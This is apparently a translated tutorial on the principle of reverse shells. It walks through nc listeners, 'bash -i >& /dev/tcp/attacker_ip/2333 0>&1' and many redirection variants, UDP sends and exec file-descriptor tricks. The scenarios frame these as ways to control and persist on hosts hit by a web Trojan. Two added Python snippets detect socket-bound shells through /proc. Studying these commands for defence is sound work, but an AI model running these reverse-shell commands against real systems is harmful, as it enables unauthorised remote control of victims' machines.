2025-04-05 Update From: SLTechnology News&Howtos > Network Security
Shulou(Shulou.com)06/01 Report--
This article mainly explains "what is the principle and function of the reverse shell (bouncing shell)". Interested friends may wish to take a look. The method introduced here is simple, fast and practical. Next, let the editor take you through "the principle and function of the reverse shell".
Bounce shell (reverse shell)
The control end listens on a TCP/UDP port; the controlled end initiates a connection to that port and hands the input and output of its command line over to the control end.
The attacker sets up the server side, and the victim host actively connects to the attacker's server program; this is called a bounce (reverse) connection. The reverse shell is the counterpart of a standard shell such as telnet or ssh: in essence it reverses the client and server roles of the network connection.
A solid understanding of file descriptors and redirection makes the reverse shell much easier to understand.
Scenarios
1. A client has been hit by your web Trojan, but it sits inside a local area network and you cannot connect to it directly.
2. The IP of the target machine changes dynamically, so you cannot control it continuously.
3. Setting up a server lets the malicious program connect out actively and persist.
4. The firewall restricts connections from outside to inside (inbound connections are not accepted). (Interaction then takes place through the full-duplex communication of the transport-layer protocol.)
Note:
Full-duplex transmission (Full-Duplex Transmissions)
A switch can receive data while it is sending data, and the two happen at the same time, just as on a phone call we can hear the other party while we are talking. Current switches support full duplex.
Simplex transmission only supports data flow in one direction: at any moment only one party can send or receive, so two-way communication is impossible. Examples: television, radio, and communication between a computer and a printer are simplex.
Half-duplex transmission allows data to flow in both directions, but at any given moment only one direction is allowed; it is effectively simplex communication that switches direction. Only one party can receive or send at a time, yet two-way communication is achieved. Example: walkie-talkie.
Definition from Wikipedia
A full-duplex system allows two-way data transmission between two devices at the same time. Telephones and mobile phones are generally full-duplex systems, because the other person's voice can be heard while speaking. A full-duplex system can be likened to an ordinary two-way road: vehicles travelling in the two directions do not affect each other because they use different lanes.
Experiment
Test 1:
Attacker side:
[root@attacker]# nc -lvp 2333          // first step
Connection from victim_ip:38712
docker0: flags=4099  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        ether XXXXXXXXXX  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0
eth0: flags=4163  mtu 1500
        inet 172.22.181.6  netmask 255.255.240.0  broadcast 172.22.191.255
        inet6 fe80::216:3eff:fe0e:9d06  prefixlen 64  scopeid 0x20
// Test result: the victim's standard output is redirected to the attacker side, but the victim cannot yet be controlled with commands.
Victim side:
[root@victim]# bash -i > /dev/tcp/attacker_ip/2333    // second step
[root@victim]# ifconfig                               // third step
[root@victim]#
Test 2:
Attacker side:
[root@attacker]# nc -lvp 2333          // first step
Connection from victim_ip:38286
hostname                               // third step (commands are typed on the attacker side)
id
whoami
Victim side:
[root@victim]# bash -i < /dev/tcp/attacker_ip/2333    // second step
[root@victim]# hostname
attacker
[root@victim]# id
uid=0(root) gid=0(root) groups=0(root)
[root@victim]# whoami
root
[root@victim]#
// Test result: the attacker's input is redirected to the victim side, but the attacker cannot see the results of the commands.
Underlying principle
Output redirection: > is equivalent to 1>. Input redirection: < is equivalent to 0<.
Appending 2>&1 to a command can be understood as attaching the error output to the standard output, that is, sending both to the same file:
The & symbol here distinguishes a file descriptor from a file. Without the &, the system would treat the 1 as a file name rather than as standard output.
Similarly, appending 1>&2 to the end of a command attaches the standard output to the error output, that is, sends both to the same file.
To see which files a process has open:
[root@lee]# nc -lvp 2333
[root@lee]# netstat -ntlp | grep 2333
tcp        0      0 0.0.0.0:2333            0.0.0.0:*               LISTEN      16303/nc
/proc/[process ID]/fd: this directory is dedicated to storing the process's file descriptors.
[root@lee]# ll /proc/16303/fd
total 0
lrwx------ 1 root root 64 Apr 20 14:41 0 -> /dev/pts/1
lrwx------ 1 root root 64 Apr 20 14:41 1 -> /dev/pts/1
lrwx------ 1 root root 64 Apr 20 14:41 2 -> /dev/pts/1
lrwx------ 1 root root 64 Apr 20 14:41 3 -> socket:[339049416]
lrwx------ 1 root root 64 Apr 20 14:41 6 -> /dev/pts/1
[root@lee]# cd /dev/pts
[root@lee]# ll
I understand the tty number above as the number of the interactive shell (terminal). Tty devices include virtual consoles, serial ports and pseudo-terminal devices.
In the image above, I had started seven interactive shells with Xshell; closing all of them but one leaves:
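The fd listing above is also what a defender keys on: a shell whose stdin, stdout and stderr all resolve to socket:[inode] (instead of /dev/pts/N) is the fingerprint the redirections in this article leave behind. The following added example (not from the article) walks /proc in the same way as the ll /proc/16303/fd command, flags shell processes whose standard descriptors are sockets, and resolves the socket inode to its peer through /proc/net/tcp; the shell names list and the IPv4-only parsing are assumptions.

```python
import os
import re

SOCKET_RE = re.compile(r"^socket:\[(\d+)\]$")

def read_text(path):
    """Read a /proc file, returning '' when it is absent or unreadable (non-Linux host, exited pid)."""
    try:
        with open(path) as fh:
            return fh.read()
    except OSError:
        return ""

def stdio_targets(pid, proc="/proc"):
    """{fd: symlink target} for fds 0, 1 and 2 of pid, as `ls -l /proc/<pid>/fd` shows them."""
    out = {}
    for fd in (0, 1, 2):
        try:
            out[fd] = os.readlink(f"{proc}/{pid}/fd/{fd}")
        except OSError:
            pass
    return out

def socket_inodes(targets):
    """Inode numbers of the stdio fds that are sockets rather than a tty or a regular file."""
    matches = (SOCKET_RE.match(t) for t in targets.values())
    return sorted({int(m.group(1)) for m in matches if m})

def parse_net_tcp(text):
    """Map socket inode -> (remote_ip, remote_port) from the text of /proc/net/tcp."""
    peers = {}
    for f in (line.split() for line in text.splitlines()[1:]):
        if len(f) >= 10:
            hex_ip, hex_port = f[2].split(":")
            # the kernel prints the IPv4 address in host byte order (little-endian on x86/arm64)
            ip = ".".join(str(b) for b in int(hex_ip, 16).to_bytes(4, "little"))
            peers[int(f[9])] = (ip, int(hex_port, 16))
    return peers

def scan_shells(proc="/proc", names=("bash", "sh", "dash", "zsh")):
    """(pid, comm, peers) for shell processes whose stdin/stdout/stderr point at a socket."""
    peers = parse_net_tcp(read_text(f"{proc}/net/tcp"))
    hits = []
    for pid in filter(str.isdigit, os.listdir(proc) if os.path.isdir(proc) else []):
        comm = read_text(f"{proc}/{pid}/comm").strip()   # process name, as in `ps`
        inodes = socket_inodes(stdio_targets(pid, proc)) if comm in names else []
        if inodes:
            hits.append((int(pid), comm, [peers.get(i, ("?", 0)) for i in inodes]))
    return hits
```

Run scan_shells() as root on a live host; the nc listener from the listing above is not reported because only its fd 3 is a socket, while a shell started through /dev/tcp shows the socket on fds 0, 1 and 2.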
/dev
dev is short for device. This directory contains all the external devices used by the Linux system and is the entry point for accessing them; accessing one of these devices is no different from accessing a file or a directory (in Linux, everything is a file).
/dev/null
/dev/null is an empty device, also known as a bit bucket or black hole. Any data can be written to it, but everything written is discarded. It is usually used to swallow unwanted output streams (and it can also serve as an empty input stream).
For example:
/dev/zero
Create a file filled with NUL bytes:
dd if=/dev/zero of=foobar count=2 bs=1024
dd copies a file using blocks of the specified size, performing the specified conversions at the same time.
Linux command summary: detailed explanation of the dd command
/dev/pty
Pseudo terminal (/dev/pty/)
Pseudo terminals (pseudo terminal) are pairs of logical terminal devices (a master and a slave; operations on the master are reflected on the slave).
/dev/tty
/dev/tty is the device file for the controlling terminal of the current process.
Other device files:
/dev/hd[a-t]: IDE devices
/dev/sd[a-z]: SCSI devices
/dev/fd[0-7]: standard floppy drives
/dev/md[0-31]: software RAID devices
/dev/loop[0-7]: local loopback devices
/dev/ram[0-15]: RAM disks
/dev/null: unlimited data sink, equivalent to a black hole
/dev/zero: infinite source of zeros
/dev/tty[0-63]: virtual terminals
/dev/ttyS[0-3]: serial ports
/dev/lp[0-3]: parallel ports
/dev/console: console
/dev/fb[0-31]: framebuffers
/dev/cdrom => /dev/hdc
/dev/modem => /dev/ttyS[0-9]
/dev/pilot => /dev/ttyS[0-9]
/dev/random: random number device
/dev/urandom: random number device

bash -i >& /dev/tcp/ip/port 0>&1
bash -i means start an interactive shell.
/dev/tcp/ip/port: this file does not actually exist (it is a virtual path provided by bash itself), but while the port is being listened on, reading from and writing to this path gives socket communication between the two hosts.
First, start listening on the attacker machine, then enter the following command on the Linux (victim) machine to send the given characters to port 2333 of the attacker machine over TCP:
echo 1 > /dev/tcp/attacker_ip/2333
Attacker machine, listening:
nc -lvp 2333
Connection from victim_ip:49948
1
The same works for UDP:
echo 2 > /dev/udp/attacker_ip/2333
Attacker machine, listening:
nc -luvp 2333
Received packet from victim_ip:22367 -> 192.168.0.226:2333 (local)
1
2>&1 sends error output and standard output to the same file (in Linux, everything is a file):
Target machine:
echo1 1 > /dev/tcp/attacker_ip/2333 2>&1
Attacker machine:
[root@attacker ~]# nc -lvp 2333
Connection from victim_ip:5479
-bash: echo1: command not found
Combining input and output redirection, the following forms all work:
bash -i 0< /dev/tcp/ip/2333 1>&0 2>&1
bash -i < /dev/tcp/ip/2333 >&0 2>&1
bash -i 1> /dev/tcp/ip/2333 0>&1 2>&1
bash -i 1> /dev/tcp/ip/2333 0>&1 2>&0
Other variants:
bash -i 1>& /dev/tcp/ip/port 0>&1
bash -i 1>& /dev/tcp/ip/port 0>&2
bash -i &> /dev/tcp/ip/port 0>&1
bash -i &> /dev/tcp/ip/port 0>&2
&> or >& after bash -i means combined output, that is, standard output (1) plus error output (2).
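Why some of these variants wire up all three descriptors while Test 1 and Test 2 each wired only one comes down to the order in which bash applies redirections (each "n>&m" is a dup2 of whatever fd m points at right now). The following added example (not from the article) is a small model of that fd table, useful for predicting what the ll /proc/<pid>/fd listing of a process started with a given command line will look like; it assumes bash in non-POSIX mode, where ">&file" and "1>&file" cover both fd 1 and fd 2, and uses a constructed starting state with all three descriptors on a terminal.

```python
# Model of bash redirection applied left to right with dup2 semantics (added example, not the
# article's code). "n>&m" copies fd m's current target into fd n; "n>file" / "n<file" open a path on fd n.
# Assumption: bash in non-POSIX mode, so ">&file" and "1>&file" redirect both fd 1 and fd 2.

TTY = "/dev/pts/1"   # constructed starting state: stdin, stdout and stderr all on a terminal


def apply_redirections(words, table=None):
    """Return the fd table {fd: target} after applying each redirection word in order."""
    fds = dict(table) if table else {0: TTY, 1: TTY, 2: TTY}
    for w in words:
        if w.startswith("&>"):                       # "&>file" is shorthand for ">file 2>&1"
            fds[1] = fds[2] = w[2:]
            continue
        i = 0
        while i < len(w) and w[i].isdigit():         # optional leading fd number
            i += 1
        num, op = w[:i], w[i:]
        if op[:2] in (">&", "<&"):
            n = int(num) if num else (1 if op[0] == ">" else 0)
            target = op[2:]
            if target.isdigit():                     # duplicate: dup2(target, n)
                if int(target) not in fds:
                    raise ValueError(f"{w}: bad file descriptor")
                fds[n] = fds[int(target)]
            elif target == "-":                      # "n>&-" closes fd n
                fds.pop(n, None)
            elif op[0] == ">" and n == 1:            # ">&file": stdout and stderr both to file
                fds[1] = fds[2] = target
            else:                                    # any other "n>&file" acts like "n>file"
                fds[n] = target
        elif op[:1] in (">", "<"):
            fds[int(num) if num else (1 if op[0] == ">" else 0)] = op[1:]
        else:
            raise ValueError(f"{w}: not a redirection")
    return fds


def stdio_all_on(fds, path):
    """True when fds 0, 1 and 2 all point at path, i.e. the process is fully wired to it."""
    return all(fds.get(n) == path for n in (0, 1, 2))
```

For example, apply_redirections(["1>/dev/tcp/attacker_ip/2333"]) leaves fd 0 on the terminal, which is exactly why Test 1 above showed output but accepted no commands.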
A small difference between bash and sh
sh follows the POSIX specification: "when a line of code fails, do not continue interpreting." bash continues executing even when something goes wrong.
Put simply, sh is a special mode of bash: sh is bash with the POSIX standard switched on, and /bin/sh is equivalent to /bin/bash --posix.
On Linux systems /bin/sh is often a symbolic link to /bin/bash:
ln -s /bin/bash /bin/sh
Other variants
Unix operating systems usually limit the number of files each process can open; ulimit -n shows the system's default number of file descriptors.
For example:
# ulimit -n
655360
This means the system supports file descriptors 0-655359.
Page 1:
Open "File" and assign fd 655359 to it:
[j]<>filename    # opens the file "filename" and assigns file descriptor "j" to it for reading and writing; if "filename" does not exist, it is created.
Eg:
exec 655359<>File
>&-     closes standard output
n>&-    closes output file descriptor n
Page 2:
Attacker machine:
[root@attacker]# nc -lvp 2333        # first step
Connection from victim_ip:46414
helloworld                           # third step
123
Victim machine:
[root@victim]# exec 65534<>/dev/tcp/attacker_ip/2333    # step 2
[root@victim]# cat <&8
Feel free to experiment with these yourself.
At this point, I believe you have a deeper understanding of "the principle and function of the reverse shell". You might as well try it out in practice. Here is the website; more related content can be found in the relevant channels. Follow us and keep learning!